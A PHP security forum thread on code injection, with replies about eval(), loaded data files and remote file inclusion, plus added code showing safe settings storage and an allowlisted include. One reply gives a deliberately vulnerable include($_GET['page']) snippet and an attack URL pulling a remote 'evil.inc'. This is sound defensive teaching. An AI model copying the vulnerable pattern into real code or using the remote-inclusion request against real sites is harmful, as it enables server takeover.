Hi everyone,
I'm new to the forum and thank you all for providing this security forum.
I can appreciate the idea of some malicious user injecting script into my html, or modifying my sql's with an sql injection, but is it possible for someone to inject php code using an unfiltered textarea (for example)?
Thanks.
PHP Injection
- feyd
- Neighborhood Spidermoddy
- Posts: 31559
- Joined: Mon Mar 29, 2004 3:24 pm
- Location: Bothell, Washington, USA
Possible, yes, but for your scripts to actually run it, you'd need some very specific code. eval() would have to be used, most likely. Although if you save data into a file and can be tricked into loading that file, that will do it too.
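The second case feyd mentions (data saved into a file that PHP later loads) is easy to fall into with a "settings writer" that generates PHP source from form input. The following is an added illustration, not code from the thread; the file names and the `siteName` setting are assumptions. It contrasts writing the raw value into PHP source with two ways of persisting it as data: `var_export()` when the file must stay PHP, and JSON when it does not.

```php
<?php
// Added example (not from the forum thread): persisting a user-supplied setting
// that a later request loads back. File names and the setting are assumptions.
declare(strict_types=1);

// Unsafe: the value is pasted straight into PHP source. Whatever follows a
// single quote in the input is handed to the PHP parser when the file is
// include()d, which is exactly the "tricked into loading that file" case.
function save_setting_unsafe(string $file, string $siteName): void
{
    $src = "<?php\n\$siteName = '" . $siteName . "';\n";
    file_put_contents($file, $src);
}

// Safer, still a PHP file: var_export() emits a correctly quoted and escaped
// PHP literal, so the input is a string value, never code.
function save_setting_var_export(string $file, string $siteName): void
{
    $src = "<?php\nreturn " . var_export(['siteName' => $siteName], true) . ";\n";
    file_put_contents($file, $src);
}

function load_setting_var_export(string $file): string
{
    $data = include $file;            // the file returns an array, it does not run input
    return (string) ($data['siteName'] ?? '');
}

// Safest: store plain data and decode it; the PHP parser never sees the input.
function save_setting_json(string $file, string $siteName): void
{
    file_put_contents($file, json_encode(['siteName' => $siteName], JSON_THROW_ON_ERROR));
}

function load_setting_json(string $file): string
{
    $data = json_decode((string) file_get_contents($file), true, 512, JSON_THROW_ON_ERROR);
    return (string) ($data['siteName'] ?? '');
}

// Constructed input: ordinary text that happens to contain an apostrophe.
$input = "Bob's Shop";
$dir   = sys_get_temp_dir();

save_setting_unsafe("$dir/settings_unsafe.php", $input);
save_setting_var_export("$dir/settings_export.php", $input);
save_setting_json("$dir/settings.json", $input);

// The unsafe file now reads  $siteName = 'Bob's Shop';  which is a parse error,
// because the apostrophe ended the string. Anything placed after that quote by a
// less friendly user would be parsed as PHP. We only show the source, we don't
// include it.
echo "unsafe file contains:\n", file_get_contents("$dir/settings_unsafe.php"), "\n";

// Both data-oriented forms round-trip the value exactly, apostrophe included.
echo "var_export round-trip: ", load_setting_var_export("$dir/settings_export.php"), "\n";
echo "json round-trip:       ", load_setting_json("$dir/settings.json"), "\n";
```

The point is the same as for eval(): once user-controlled bytes reach the PHP parser, escaping is the only thing between data and code, so it is safer to keep them as data (JSON, a database row) than to escape them into source.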
Thanks feyd.
(To keep threads on topic, i've begun another thread over at viewtopic.php?p=251801#251801 - your help over there would be also appreciated.)
- Maugrim_The_Reaper
- DevNet Master
- Posts: 2704
- Joined: Tue Nov 02, 2004 5:43 am
- Location: Ireland
If allow_url_fopen is enabled in your php.ini configuration, include() and require() calls can also accept a URL to the file to include. If this is possible, allowing an unfiltered/unvalidated variable to be a prepend to an include path can result in an attacker exploiting this remote capability to point the include request to a remote file they themselves have written. This is even more dangerous if they know enough information to be capable of accurately guessing your webroot and lower directory paths.
Simple example:
You create an application file which loads a database connection. You also include a file (perhaps as part of a simple front controller).
Code:
// load database connection
// the raw "page" value is used as part of the include path without any validation
if(isset($_GET['page']) && !empty($_GET['page'])) {
    include($_GET['page'] . '.inc');
} else {
    include('index.inc');
}
exit;
Now the attacker could simply store a PHP file called "evil.inc" at http://example.com/evil.inc and call the request (to your script):
http://www.yourserver.com/index.php?pag ... m/evil.inc
Result?
Your include() will use the "page" GET variable, fetch and parse the evil.inc script, and execute it. If they know your application well enough (error messages are a huge help there) they can manage to do a lot - basically anything YOU could do from PHP on your server.
Fix?
Check all user variables.
The solution here is to only allow alphabetic characters in the values - negating slash/period/colon characters means no URL will be accepted to taint our script...
Code:
// load database connection
$clean = array(); // store filtered variables separately
// filter, filter, filter - check all characters are alphabetical (no colons, slashes, periods...)
if(isset($_GET['page']) && !empty($_GET['page']) && ctype_alpha($_GET['page'])) {
    $clean['page'] = $_GET['page'];
} else {
    $clean['page'] = 'index';
}
// only the filtered copy ever reaches include()
if($clean['page']) include($clean['page'] . '.inc');
exit;
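The ctype_alpha() filter above keeps URLs and "../" out, but an alphabetic value can still name any *.inc file in the directory (a config or admin include, say). The following is an added example, not the poster's code, that keeps that filter as the first check and adds an explicit allowlist of page names plus a realpath() containment check, then runs a few constructed request values through it. The directory, page names and file contents are assumptions made for the demonstration. One caveat for readers on newer PHP: since PHP 5.2 the ability of include() to fetch a URL is governed by the separate allow_url_include setting (off by default), while allow_url_fopen only affects functions such as fopen() and file_get_contents(); validating the value is still necessary because local inclusion of the wrong file is just as much a problem.

```php
<?php
// Added example (not from the forum thread): resolving a user-supplied "page"
// name to an include file without letting the raw value reach include().
// Directory layout and page names below are assumptions for the demonstration.
declare(strict_types=1);

// Explicit allowlist of page name -> include file. Only these can ever be loaded.
const PAGES = [
    'index'   => 'index.inc',
    'about'   => 'about.inc',
    'contact' => 'contact.inc',
];

// Returns the absolute path of the include file, or null if the request must be
// refused. Empty input falls back to 'index', as in the post's fixed version.
function resolve_page(?string $raw, string $baseDir): ?string
{
    $page = ($raw === null || $raw === '') ? 'index' : $raw;
    if (!ctype_alpha($page)) {
        return null;                  // same first line of defence as the post
    }
    if (!isset(PAGES[$page])) {
        return null;                  // alphabetic, but not a page we publish
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$page]);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                  // missing file, or resolved outside the base dir
    }
    return $path;
}

// Constructed fixture: a temporary directory holding the three pages and one
// file that exists on disk but is deliberately not a page.
$dir = sys_get_temp_dir() . '/pages_' . bin2hex(random_bytes(4));
mkdir($dir);
foreach (PAGES as $file) {
    file_put_contents("$dir/$file", "<?php echo 'rendered ' . basename(__FILE__) . \"\\n\";\n");
}
file_put_contents("$dir/config.inc", "<?php /* settings that must never be served */\n");

// Constructed request values, including the shapes the post warns about.
$requests = [
    'about',                      // accepted: in the allowlist
    'config',                     // alphabetic, but not in the allowlist: refused
    'http://example.com/evil',    // remote URL: refused by ctype_alpha()
    '../secret/config',           // traversal: refused by ctype_alpha()
    '',                           // empty: falls back to index
];

foreach ($requests as $page) {
    printf("%-28s -> ", var_export($page, true));
    $path = resolve_page($page, $dir);
    if ($path === null) {
        echo "refused\n";
        continue;
    }
    include $path;                // prints "rendered <file>"
}

// Tidy up the fixture.
foreach (glob("$dir/*") as $f) {
    unlink($f);
}
rmdir($dir);
```

Keeping the map of allowed pages in code (rather than deriving file names from input, even filtered input) means the set of includable files is visible in one place and can be reviewed; the realpath() check is belt-and-braces in case the map is later edited to point somewhere it should not.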